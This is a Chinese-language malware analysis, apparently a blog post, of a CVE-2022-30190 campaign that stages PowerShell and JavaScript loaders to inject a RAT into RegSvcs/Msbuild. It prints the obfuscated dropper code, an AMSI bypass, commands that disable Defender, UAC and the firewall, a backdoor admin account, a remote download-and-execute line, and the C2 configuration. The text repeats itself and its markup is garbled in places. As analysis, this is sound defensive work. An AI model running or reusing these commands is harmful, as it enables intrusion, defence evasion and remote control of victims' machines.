在线沙箱:
https://app.any.run/tasks/33363f16-8146-4bef-948b-362ec2cb0f6d/
https://www.joesandbox.com/analysis/1284837/1/html
CVE-2022-30190利用
(远程链接)
https://huskidkifklaoksikfkfijsju.blogspot.com/atom.xml #已404
https://73cceb63-7ecd-45e2-9eab-f8d.../73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx
从分析文找到远程加载的payload
http:<span>//73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt</span><br>
可以看到有几个混淆的变量
<span>$</span><span>X1</span><br><span>$</span><span>colabber</span><br><span>$</span><span>Hetmosphyre</span><br><span>$</span><span>X2</span><br>
阶段一
<span>-></span><span> 运行winword</span><br><span> -></span><span>延迟3秒</span><br><span> -></span><span> 删除C:\Users\\Downloads\下的所有.docx文件</span><br><span> -></span><span> 删除C:\Users\\Desktop\下的所有.docx文件</span><br><span> -></span><span> 创建C:\ProgramData\MinMinons</span><br><span> -></span><span>将<span>$Gamilopera</span>写入C:\ProgramData\MinMinons\Candlegraphy.~___~</span><br><span>-></span><span>IEX运行<span>$Gamilopera</span>变量</span><br>
$X1<br>->js内容三层hex解密<br> ->js内容写入到C:\ProgramData\MinMinons\Microsoftupdate.js<br> ->创建计划任务运行js schtasks /create /sc MINUTE /mo <span>180</span> /tn MOperaChrome /F /tr C:\ProgramData\MinMinons\Microsoftupdate.js<br> js阶段:<br> ->ActiveXObject组件通过CLSID:{F935DC22<span>-1</span>CF0<span>-11</span>D0-ADB9<span>-00</span>C04FD58A0B}实例化wscript.Shell<br> ->延迟<span>3</span>秒<br> ->要运行的命令替换运行powershell-> powershell -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candlegraphy.~___~ | .(<span>'{x}{9}'</span>.replace(<span>'9'</span>,<span>'0'</span>).replace(<span>'x'</span>,<span>'1'</span>)-f<span>'GIMGUL'</span>,<span>'%%'</span>).replace(<span>'%%'</span>,<span>'I'</span>).replace(<span>'GIMGUL'</span>,<span>'EX'</span>) | ping <span>127.0</span><span>.0</span><span>.1</span><br>
C:\ProgramData\MinMinons\Microsoftupdate.js
var <span>0x3195=["\x6E\x65\x77\x3A\x7B\x46\x39\x33\x35\x44\x43\x32\x32\x2D\x31\x43\x46\x30\x2D\x31\x31\x44\x30\x2D\x41\x44\x42\x39\x2D\x30\x30\x43\x30\x34\x46\x44\x35\x38\x41\x30\x42\x7D","\x53\x6C\x65\x65\x70","\x70\x6F\x77\x65\x72\x73\x68\x2A\x5E\x20\x2D\x45\x50\x20\x42\x79\x70\x61\x73\x73\x20\x2D\x63\x20\x47\x65\x74\x2D\x43\x6F\x6E\x74\x65\x6E\x74\x20\x2D\x52\x41\x57\x20\x43\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x44\x61\x74\x61\x5C\x4D\x69\x6E\x4D\x69\x6E\x6F\x6E\x73\x5C\x43\x61\x6E\x64\x6C\x2A\x67\x72\x61\x70\x68\x79\x2E\x7E\x5F\x5F\x5F\x7E\x20\x7C\x20\x2E\x28\x27\x7B\x78\x7D\x7B\x39\x7D\x27\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x27\x39\x27\x2C\x27\x30\x27\x29\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x27\x78\x27\x2C\x27\x31\x27\x29\x2D\x66\x27\x47\x49\x4D\x47\x55\x4C\x27\x2C\x27\x25\x25\x27\x29\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x27\x25\x25\x27\x2C\x27\x49\x27\x29\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x27\x47\x49\x4D\x47\x55\x4C\x27\x2C\x27\x45\x58\x27\x29\x20\x7C\x20\x70\x69\x6E\x67\x20\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31","\x2A","\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5E","\x6C\x6C","\x52\x75\x6E"];/new:{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}Sleeppowersh^ -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candl*graphy.~</span><span>~ | .('{x}{9}'.replace('9','0').replace('x','1')-f'GIMGUL','%%').replace('%%','I').replace('GIMGUL','EX') | ping 127.0.0.1*ereplace^llRun*/combackmyex= ActiveXObject(_0x3195[0]); //new:{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}WScript[_0x3195[1]](3000); //延??时???3秒? Sleep(3000)Jigijigi= _0x3195[2]; //powersh*^ -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candl*graphy.~</span><span>~ | .('{x}{9}'.replace('9','0').replace('x','1')-f'GIMGUL','%%').replace('%%','I').replace('GIMGUL','EX') | ping 127.0.0.1Jigijigi= Jigijigi[</span>0x3195[<span>5</span>]](<span>0x3195[3],</span>0x3195[<span>4</span>]); //replace <span>* eJigijigi= Jigijigi[0x3195[5]](_0x3195[3],_0x3195[4]); //replace </span> eJigijigi= Jigijigi[<span>_0x3195[5</span>]](<span>_0x3195[3],</span>0x3195[<span>4</span>]); //replace <span> eJigijigi= Jigijigi[0x3195[5]](_0x3195[3],_0x3195[4]); //replace *</span> eJigijigi= Jigijigi[<span>_0x3195[5</span>]](<span>_0x3195[6],</span>0x3195[<span>7</span>]); //replace ^ ll -> powershell -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candlegraphy.~<span>___</span>~ | .('{x}{9}'.replace('9','0').replace('x','1')-f'GIMGUL','%%').replace('%%','I').replace('GIMGUL','EX') | ping 127.0.0.1combackmyex[<span>_0x3195[8</span>]](Jigijigi,0,true) //Run 运?行Dpowershell<br>
C:\ProgramData\MinMinons\Candlegraphy.~___~
阶段2
$colabber
$Hetmosphyre
实现的功能
-> [Ref].Assembly.GetType(<span>'System.Management.Automation.AmsiUtils'</span>).GetField(<span>'amsiInitFailed'</span>,<span>'NonPublic,Static'</span>).SetValue($null,$true) AMSI绕过<br> -> 注册表设置COM口劫持amsi绕过 <span>'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32'</span> -N <span>'(Default)'</span> -V <span>"C:\IDontExist.dll"</span><br> ->解密两个.NET的PE,分别赋值变量$Ripple - <span>2.4</span>.dll 和$$Ripple - chas.exe<br> ->$Ripple .NET内存加载 <span>2.4</span>.dll <span>nanamespace:</span>A <span><span>class</span>:<span>B</span> <span>Method</span>:<span>C</span></span><br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"</span>,[OBJECT[]]$Ripple)<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"</span>,[OBJECT[]]$Ripple)<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"</span>,[OBJECT[]]$Ripple)<br> 内存加载实现将chas.exe进程注入到RegSvcs.exe和Msbuild.exe<br>
* 2<span>.4</span><span>.dll</span> <span>-</span> 傀儡进程<br>* <span>chas</span><span>.exe</span> <span>-</span> <span>C2</span><br>
DLL是用de4ot混淆过的
2.4.DLL
去混淆
<span><span>public</span> <span>static</span> <span>string</span> <span>smethod_0</span><span>(<span>string</span> string_11)</span><br> </span>{<br> StringBuilder stringBuilder = <span>new</span> StringBuilder();<br> <span>for</span> (<span>int</span> i = <span>0</span>; i < string_11.Length; i += <span>2</span>)<br> {<br> <span>int</span> value = Convert.ToInt32(string_11.Substring(i, <span>2</span>), <span>16</span>);<br> stringBuilder.Append(Convert.ToChar(value));<br> }<br> <span>return</span> stringBuilder.ToString();<br> }<br> <span><span>public</span> <span>static</span> <span>string</span> <span>ReverseString</span><span>(<span>string</span> s)</span><br> </span>{<br> <span>char</span>[] <span>array</span> = s.ToCharArray();<br> Array.Reverse(<span>array</span>);<br> <span>return</span> <span>new</span> <span>string</span>(<span>array</span>);<br> }<br>
<span>// Token: 0x04000001 RID: 1</span><br> <span>private</span> <span>static</span> <span>string</span> string_0 = B.smethod_0(B.ReverseString(<span>"2333C656E62756B6"</span>)); <span>//Kernel32</span><br><br> <span>// Token: 0x04000002 RID: 2</span><br> <span>private</span> <span>static</span> <span>string</span> string_1 = B.smethod_0(B.ReverseString(<span>"46165627864556D657375625"</span>)); <span>//ResumeThread</span><br><br> <span>// Token: 0x04000003 RID: 3</span><br> <span>private</span> <span>static</span> <span>string</span> string_2 = B.smethod_0(<span>"576F77363<?>53657<?>5<?>687265616<?><?>36F6E7<?>65787<?>"</span>.Replace(<span>"<?>"</span>, <span>"4"</span>)); <span>//Wow64SetThreadContext</span><br><br> <span>// Token: 0x04000004 RID: 4</span><br> <span>private</span> <span>static</span> <span>string</span> string_3 = B.smethod_0(B.ReverseString(<span>"47875647E6F634461656278645475635"</span>)); <span>//SetThreadContext</span><br><br> <span>// Token: 0x04000005 RID: 5</span><br> <span>private</span> <span>static</span> <span>string</span> string_4 = B.smethod_0(<span>"57?F773?3447?57454?872?5?1?443?F?E74?57874"</span>.Replace(<span>"?"</span>, <span>"6"</span>)); <span>//Wow64GetThreadContext</span><br><br> <span>// Token: 0x04000006 RID: 6</span><br> <span>private</span> <span>static</span> <span>string</span> string_5 = B.smethod_0(B.ReverseString(<span>"47875647E6F634461656278645475674"</span>)); <span>//GetThreadContext</span><br><br> <span>// Token: 0x04000007 RID: 7</span><br> <span>private</span> <span>static</span> <span>string</span> string_6 = B.smethod_0(<span>"5??9727475?1?C41?C?C?F?34578"</span>.Replace(<span>"?"</span>, <span>"6"</span>)); <span>//VirtualAllocEx</span><br><br> <span>// Token: 0x04000008 RID: 8</span><br> <span>private</span> <span>static</span> <span>string</span> string_7 = B.smethod_0(B.ReverseString(<span>"9727F6D656D437375636F627055647962775"</span>)); <span>//WriteProcessMemory</span><br><br> <span>// Token: 0x04000009 RID: 9</span><br> <span>private</span> <span>static</span> <span>string</span> string_8 = B.smethod_0(<span>"5265616450?26F6365?3?34D656D6F?2?9"</span>.Replace(<span>"?"</span>, <span>"7"</span>)); <span>//ReadProcessMemory</span><br><br> <span>// Token: 0x0400000A RID: 10</span><br> <span>private</span> <span>static</span> <span>string</span> string_9 = B.smethod_0(B.ReverseString(<span>"E6F6964736563566F4775696650716D6E65577A5"</span>)); <span>//ZwUnmapViewOfSection</span><br><br> <span>// Token: 0x0400000B RID: 11</span><br> <span>private</span> <span>static</span> <span>string</span> string_10 = B.smethod_0(<span>"4372?5?174?55072?F?3?5737341"</span>.Replace(<span>"?"</span>, <span>"6"</span>)); <span>//CreateProcessA</span><br><br> <span>// Token: 0x0400000C RID: 12</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate0 delegate0_0 = B.smethod_1<B.Delegate0>(B.string_0, B.string_1);<br><br> <span>// Token: 0x0400000D RID: 13</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate1 delegate1_0 = B.smethod_1<B.Delegate1>(B.string_0, B.string_2);<br><br> <span>// Token: 0x0400000E RID: 14</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate2 delegate2_0 = B.smethod_1<B.Delegate2>(B.string_0, B.string_3);<br><br> <span>// Token: 0x0400000F RID: 15</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate3 delegate3_0 = B.smethod_1<B.Delegate3>(B.string_0, B.string_4);<br><br> <span>// Token: 0x04000010 RID: 16</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate4 delegate4_0 = B.smethod_1<B.Delegate4>(B.string_0, B.string_5);<br><br> <span>// Token: 0x04000011 RID: 17</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate5 delegate5_0 = B.smethod_1<B.Delegate5>(B.string_0, B.string_6);<br><br> <span>// Token: 0x04000012 RID: 18</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate6 delegate6_0 = B.smethod_1<B.Delegate6>(B.string_0, B.string_7);<br><br> <span>// Token: 0x04000013 RID: 19</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate7 delegate7_0 = B.smethod_1<B.Delegate7>(B.string_0, B.string_8);<br><br> <span>// Token: 0x04000014 RID: 20</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate8 delegate8_0 = B.smethod_1<B.Delegate8>(B.smethod_0(<span>"6E74646C6C"</span>), B.string_9);<br><br> <span>// Token: 0x04000015 RID: 21</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate9 delegate9_0 = B.smethod_1<B.Delegate9>(B.string_0, B.string_10);<br>
chas.exe
创建互斥体,线程随机延时。接收socket回包执行对应的功能
C2配置
<span>namespace</span> <span>Stub</span><br>{<br> <span>// Token: 0x02000007 RID: 7</span><br> <span>public</span> <span>class</span> <span>Settings</span><br> {<br> <span>// Token: 0x04000006 RID: 6</span><br> <span>public</span> <span>static</span> <span>string</span> Host = <span>"stanthely2023.duckdns.org"</span>;<br><br> <span>// Token: 0x04000007 RID: 7</span><br> <span>public</span> <span>static</span> <span>string</span> Port = <span>"7000"</span>;<br><br> <span>// Token: 0x04000008 RID: 8</span><br> <span>public</span> <span>static</span> <span>string</span> KEY = <span>"<123456789>"</span>;<br><br> <span>// Token: 0x04000009 RID: 9</span><br> <span>public</span> <span>static</span> <span>string</span> SPL = <span>"<Xwormmm>"</span>;<br><br> <span>// Token: 0x0400000A RID: 10</span><br> <span>public</span> <span>static</span> <span>string</span> USBNM = <span>"USB.exe"</span>;<br><br> <span>// Token: 0x0400000B RID: 11</span><br> <span>public</span> <span>static</span> <span>readonly</span> <span>string</span> Mutexx = <span>"tddITwpC5yRaJiTI"</span>;<br><br> <span>// Token: 0x0400000C RID: 12</span><br> <span>public</span> <span>static</span> Mutex _appMutex;<br><br> <span>// Token: 0x0400000D RID: 13</span><br> <span>public</span> <span>static</span> <span>bool</span> usbC;<br><br> <span>// Token: 0x0400000E RID: 14</span><br> <span>public</span> <span>static</span> <span>string</span> current = Process.GetCurrentProcess().MainModule.FileName;<br> }<br>
通讯使用AES加密
C2功能:
|function|note|
|——–|—-|
|Ping|心跳包功能|
|Info|获取被控主机详细信息|
|admin|判断是否为管理员|
|Antivirus|枚举杀毒|
|STDos|DDOS|
|Plugin|动态加载.NET|
|Download|下载者|
|getDrives|枚举盘符/USB|
|getFiles|获取文件信息|
|getFolders|遍历文件夹|
$DEP
-> 注册表设置COM口劫持amsi绕过 <span>'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32'</span> -N <span>'(Default)'</span> -V <span>"C:\IDontExist.dll"</span><br> -> Defender后缀加白<span>:<span>".bat"</span></span>,<span>".ppam"</span>,<span>".xls"</span>,<span>".docx"</span>,<span>".bat"</span>,<span>".exe"</span>,<span>".vbs"</span>,<span>".js"</span>,路径加白<span>:<span>"C:\","</span>D</span><span>:</span>\<span>","</span><span>E:</span>\<span>",进程加白:"</span>explorer.exe<span>","</span>kernel32.dll<span>","</span>kernel32.dll<span>","</span>aspnet_compiler.exe<span>","</span>cvtres.exe<span>","</span>CasPol.exe<span>","</span>csc.exe<span>","</span>csc.exe<span>","</span>Msbuild.exe<span>","</span>ilasm.exe<span>","</span>InstallUtil.exe<span>","</span>jsc.exe<span>","</span>Calc.exe<span>","</span>powershell.exe<span>","</span>rundll32.exe<span>","</span>conhost.exe<span>","</span>Cscript.exe<span>","</span>mshta.exe<span>","</span>cmd.exe<span>","</span>DefenderisasuckingAntivirus<span>","</span>wscript.exe<span>" IP加白:"</span><span>127.0</span>.<span>0</span>.<span>1</span><span>"<br> -> Defender IDS关闭<br> -> Defender关闭<br> -> UAC限制开启 New-Ipublicroperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force<br> -> 停止WinDefend服务,取消WinDefend服务自启<br> -> 创建用户System32 pwd:123添加到管理员,将创建的System32用户添加到"</span>Remote Desktop Users<span>"组<br> -> 停止WinDefend服务,停止WdNisSvc服务,停止WdNisSvc服务,删除windefend服务<br> -> 防火墙关闭<br></span>
阶段3
$X2
-> 三层<span>hex</span>解密js内容写入C:\ProgramData\MinMinons\miguan.js<br> -> 计划任务运行miguan.js schtasks /create /sc MINUTE /mo <span>164</span> /tn miguaned /F /<span>tr</span> <span>"$helogamanunu C:\\ProgramData\\MinMinons\\miguan.js"</span><br> -> <span>5</span>秒后计划执行powershell Schtasks.exe /create /sc minute /mo <span>120</span> /tn escansupdate /f /<span>tr</span> “wscript.exe //b //e:jscript c:\\programdata\\REDACTED\\windowsdefenderupdate.js” powershell.exe “c:\windows\system32\windowspowershell\v1.<span>0</span>\powershell.exe” -ep bypass -c (i’w’r(‘hxxps:<span>//powpowpowff</span>.blogspot[.]com/atom.xml’) -useb) | .(‘<span>{1}</span><span>{0}</span>’-f’ex’,’i’) | ping <span>127.0</span>.<span>0</span>.<span>1</span><br> -> 将<span>"C:\\ProgramData\\MinMinons\" 下所有文件复制到开机自启路径(Startup)<br> ->删除C:\ProgramData\MinMinons\Candlegraphy.~___~<br> ->删除C:\ProgramData\MinMinons\.vbs<br> ->删除C:\ProgramData\MinMinons\.exe<br></span>
eval(function(p,a,c,k,e,d){e=function(c){return(c<span><span><<span>a?'':e(parseInt(c</span>/<span>a</span>)))+((<span>c</span>=<span>c%a)</span>></span></span>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[<span>e(c)</span>]=k[<span>c</span>]||e(c)}k=[<span>function(e){return d[e</span>]}];e=function(){return'\\w+'};c=1};while(c--){if(k[<span>c</span>]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[<span>c</span>])}}return p}('4=q("o:{n-m-l-g-j}");i[<span>"8"</span>](<span>d</span>);2="b>h<span>^ -a p>> -c (5\'w\'r(\'k\') -u></span>B) | .(\'{x}{9}\'.3(\'9\',\'0\').3(\'x\',\'1\')-f\'6\',\'%%\').3(\'%%\',\'5\').3(\'6\',\'t\') | v A.0.0.1";2=2.3("<span>","e");2=2.3("</span>","e");2=2.3("*","e");2=2.3("^","z");2=2.3(">","s");2=2.3(">","s");2=2.3(">","s");2=2.3(">","s");4[<span>"y"</span>](<span>2,0,7</span>);',38,38,'||Jigijigi|replace|combackmyex|I|geleography|true|Sleep||eP|power||5000|||ADB9||WScript|00C04FD58A0B|https://billielishhui.blogspot.com/...Object|||EX||ping|||RUN|ll|127|'.split('|'),0,{}))<br>
<span>1</span>.ps1<br>-> 运行winword<br>->延迟<span>3</span>秒<br>-> 删除C:\Users\\Downloads\下的所有.docx文件<br>-> 删除C:\Users\\Desktop\下的所有.docx文件<br>-> 创建C:\ProgramData\MinMinons<br>->将$Gamilopera写入C:\ProgramData\MinMinons\Candlegraphy.~<span>_</span>~<br>->IEX运行$Gamilopera变量<br> 第一阶段:<br> ->js内容三层<span>hex</span>解密<br> ->js内容写入到C:\ProgramData\MinMinons\Microsoftupdate.js<br> ->创建计划任务运行js schtasks /create /sc MINUTE /mo <span>180</span> /tn MOperaChrome /F /<span>tr</span> C:\ProgramData\MinMinons\Microsoftupdate.js<br> js阶段:<br> ->ActiveXObject组件通过CLSID:{F935DC22-<span>1</span>CF<span>0</span>-<span>11</span>D<span>0</span>-ADB9-<span>00</span>C04FD58A0B}实例化wscript.Shell<br> ->延迟<span>3</span>秒<br> ->要运行的命令替换运行powershell-> powershell -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candlegraphy.~<span></span>~ | .(<span>'{x}{9}'</span>.replace(<span>'9'</span>,<span>'0'</span>).replace(<span>'x'</span>,<span>'1'</span>)-f<span>'GIMGUL'</span>,<span>'%%'</span>).replace(<span>'%%'</span>,<span>'I'</span>).replace(<span>'GIMGUL'</span>,<span>'EX'</span>) | ping <span>127.0</span>.<span>0</span>.<span>1</span><br><br> 第二阶段:<br> -> [Ref].Assembly.GetType(<span>'System.Management.Automation.AmsiUtils'</span>).GetField(<span>'amsiInitFailed'</span>,<span>'NonPublic,Static'</span>).SetValue($null,$true) AMSI绕过<br> -> 注册表设置COM口劫持amsi绕过 <span>'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32'</span> -N <span>'(Default)'</span> -V <span>"C:\IDontExist.dll"</span><br> ->解密两个.NET的PE,分别赋值变量$Ripple - <span>2.4</span>.dll 和$$Ripple - chas.exe<br> ->$Ripple .NET内存加载 <span>2.4</span>.dll nanamespace:A class:B Method:C<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"</span>,[OBJECT[]]$Ripple)<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"</span>,[OBJECT[]]$Ripple)<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"</span>,[OBJECT[]]$Ripple)<br> 内存加载实现将chas.exe进程注入到RegSvcs.exe和Msbuild.exe<br> -> 注册表设置COM口劫持amsi绕过 <span>'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32'</span> -N <span>'(Default)'</span> -V <span>"C:\IDontExist.dll"</span><br> -> Defender后缀加白:<span>".bat"</span>,<span>".ppam"</span>,<span>".xls"</span>,<span>".docx"</span>,<span>".bat"</span>,<span>".exe"</span>,<span>".vbs"</span>,<span>".js"</span>,路径加白:<span>"C:\","</span>D:\<span>","</span>E:\<span>",进程加白:"</span>explorer.exe<span>","</span>kernel32.dll<span>","</span>kernel32.dll<span>","</span>aspnet_compiler.exe<span>","</span>cvtres.exe<span>","</span>CasPol.exe<span>","</span>csc.exe<span>","</span>csc.exe<span>","</span>Msbuild.exe<span>","</span>ilasm.exe<span>","</span>InstallUtil.exe<span>","</span>jsc.exe<span>","</span>Calc.exe<span>","</span>powershell.exe<span>","</span>rundll32.exe<span>","</span>conhost.exe<span>","</span>Cscript.exe<span>","</span>mshta.exe<span>","</span>cmd.exe<span>","</span>DefenderisasuckingAntivirus<span>","</span>wscript.exe<span>" IP加白:"</span><span>127.0</span>.<span>0</span>.<span>1</span><span>"<br> -> Defender IDS关闭<br> -> Defender关闭<br> -> UAC限制开启 New-Ipublicroperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force<br> -> 停止WinDefend服务,取消WinDefend服务自启<br> -> 创建用户System32 pwd:123添加到管理员,将创建的System32用户添加到"</span>Remote Desktop Users<span>"组<br> -> 停止WinDefend服务,停止WdNisSvc服务,停止WdNisSvc服务,删除windefend服务<br> -> 防火墙关闭<br><br> 第三阶段:<br> -> 三层hex解密js内容写入C:\ProgramData\MinMinons\miguan.js<br> -> 计划任务运行miguan.js schtasks /create /sc MINUTE /mo 164 /tn miguaned /F /tr "</span>$helogamanunu C:\\ProgramData\\MinMinons\\miguan.js<span>"<br> -> 5秒后计划执行powershell Schtasks.exe /create /sc minute /mo 120 /tn escansupdate /f /tr “wscript.exe //b //e:jscript c:\\programdata\\REDACTED\\windowsdefenderupdate.js” powershell.exe “c:\windows\system32\windowspowershell\v1.0\powershell.exe” -ep bypass -c (i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) | .(‘{1}{0}’-f’ex’,’i’) | ping 127.0.0.1<br> -> 将"</span>C:\\ProgramData\\MinMinons\<span>" 下所有文件复制到开机自启路径(Startup)<br> ->删除C:\ProgramData\MinMinons\Candlegraphy.~__~<br> ->删除C:\ProgramData\MinMinons\.vbs<br> ->删除C:\ProgramData\MinMinons\.exe<br></span>
解密完这些混淆一共得到11个文件:
powershell主要关注的
<span><span>Function</span> <span>Bulega</span> </span>{<br> param($Bulegagone)<br> $Bulegagone = -join ($Bulegagone -split <span>'(..)'</span> | ? { $_ } | % { [char][convert]::ToUInt32($_,<span>16</span>) })<br> <span>return</span> $Bulegagone<br>}<br><br>遍历混淆的十六进制编码进行解码<br><br><br>.(<span>'{x}{9}'</span>.replace(<span>'9'</span>,<span>'0'</span>).replace(<span>'x'</span>,<span>'1'</span>)-f<span>'gomaliker'</span>,<span>'%%'</span>).replace(<span>'%%'</span>,<span>'I'</span>).replace(<span>'gomaliker'</span>,<span>'EX'</span>)<br>IEX<br>
https://app.any.run/tasks/33363f16-8146-4bef-948b-362ec2cb0f6d/
https://www.joesandbox.com/analysis/1284837/1/html
CVE-2022-30190利用
(远程链接)
https://huskidkifklaoksikfkfijsju.blogspot.com/atom.xml #已404
https://73cceb63-7ecd-45e2-9eab-f8d.../73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx
从分析文找到远程加载的payload
http:<span>//73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt</span><br>
可以看到有几个混淆的变量
<span>$</span><span>X1</span><br><span>$</span><span>colabber</span><br><span>$</span><span>Hetmosphyre</span><br><span>$</span><span>X2</span><br>
阶段一
<span>-></span><span> 运行winword</span><br><span> -></span><span>延迟3秒</span><br><span> -></span><span> 删除C:\Users\\Downloads\下的所有.docx文件</span><br><span> -></span><span> 删除C:\Users\\Desktop\下的所有.docx文件</span><br><span> -></span><span> 创建C:\ProgramData\MinMinons</span><br><span> -></span><span>将<span>$Gamilopera</span>写入C:\ProgramData\MinMinons\Candlegraphy.~___~</span><br><span>-></span><span>IEX运行<span>$Gamilopera</span>变量</span><br>
$X1<br>->js内容三层hex解密<br> ->js内容写入到C:\ProgramData\MinMinons\Microsoftupdate.js<br> ->创建计划任务运行js schtasks /create /sc MINUTE /mo <span>180</span> /tn MOperaChrome /F /tr C:\ProgramData\MinMinons\Microsoftupdate.js<br> js阶段:<br> ->ActiveXObject组件通过CLSID:{F935DC22<span>-1</span>CF0<span>-11</span>D0-ADB9<span>-00</span>C04FD58A0B}实例化wscript.Shell<br> ->延迟<span>3</span>秒<br> ->要运行的命令替换运行powershell-> powershell -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candlegraphy.~___~ | .(<span>'{x}{9}'</span>.replace(<span>'9'</span>,<span>'0'</span>).replace(<span>'x'</span>,<span>'1'</span>)-f<span>'GIMGUL'</span>,<span>'%%'</span>).replace(<span>'%%'</span>,<span>'I'</span>).replace(<span>'GIMGUL'</span>,<span>'EX'</span>) | ping <span>127.0</span><span>.0</span><span>.1</span><br>
C:\ProgramData\MinMinons\Microsoftupdate.js
var <span>0x3195=["\x6E\x65\x77\x3A\x7B\x46\x39\x33\x35\x44\x43\x32\x32\x2D\x31\x43\x46\x30\x2D\x31\x31\x44\x30\x2D\x41\x44\x42\x39\x2D\x30\x30\x43\x30\x34\x46\x44\x35\x38\x41\x30\x42\x7D","\x53\x6C\x65\x65\x70","\x70\x6F\x77\x65\x72\x73\x68\x2A\x5E\x20\x2D\x45\x50\x20\x42\x79\x70\x61\x73\x73\x20\x2D\x63\x20\x47\x65\x74\x2D\x43\x6F\x6E\x74\x65\x6E\x74\x20\x2D\x52\x41\x57\x20\x43\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x44\x61\x74\x61\x5C\x4D\x69\x6E\x4D\x69\x6E\x6F\x6E\x73\x5C\x43\x61\x6E\x64\x6C\x2A\x67\x72\x61\x70\x68\x79\x2E\x7E\x5F\x5F\x5F\x7E\x20\x7C\x20\x2E\x28\x27\x7B\x78\x7D\x7B\x39\x7D\x27\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x27\x39\x27\x2C\x27\x30\x27\x29\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x27\x78\x27\x2C\x27\x31\x27\x29\x2D\x66\x27\x47\x49\x4D\x47\x55\x4C\x27\x2C\x27\x25\x25\x27\x29\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x27\x25\x25\x27\x2C\x27\x49\x27\x29\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x27\x47\x49\x4D\x47\x55\x4C\x27\x2C\x27\x45\x58\x27\x29\x20\x7C\x20\x70\x69\x6E\x67\x20\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31","\x2A","\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5E","\x6C\x6C","\x52\x75\x6E"];/new:{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}Sleeppowersh^ -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candl*graphy.~</span><span>~ | .('{x}{9}'.replace('9','0').replace('x','1')-f'GIMGUL','%%').replace('%%','I').replace('GIMGUL','EX') | ping 127.0.0.1*ereplace^llRun*/combackmyex= ActiveXObject(_0x3195[0]); //new:{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}WScript[_0x3195[1]](3000); //延??时???3秒? Sleep(3000)Jigijigi= _0x3195[2]; //powersh*^ -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candl*graphy.~</span><span>~ | .('{x}{9}'.replace('9','0').replace('x','1')-f'GIMGUL','%%').replace('%%','I').replace('GIMGUL','EX') | ping 127.0.0.1Jigijigi= Jigijigi[</span>0x3195[<span>5</span>]](<span>0x3195[3],</span>0x3195[<span>4</span>]); //replace <span>* eJigijigi= Jigijigi[0x3195[5]](_0x3195[3],_0x3195[4]); //replace </span> eJigijigi= Jigijigi[<span>_0x3195[5</span>]](<span>_0x3195[3],</span>0x3195[<span>4</span>]); //replace <span> eJigijigi= Jigijigi[0x3195[5]](_0x3195[3],_0x3195[4]); //replace *</span> eJigijigi= Jigijigi[<span>_0x3195[5</span>]](<span>_0x3195[6],</span>0x3195[<span>7</span>]); //replace ^ ll -> powershell -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candlegraphy.~<span>___</span>~ | 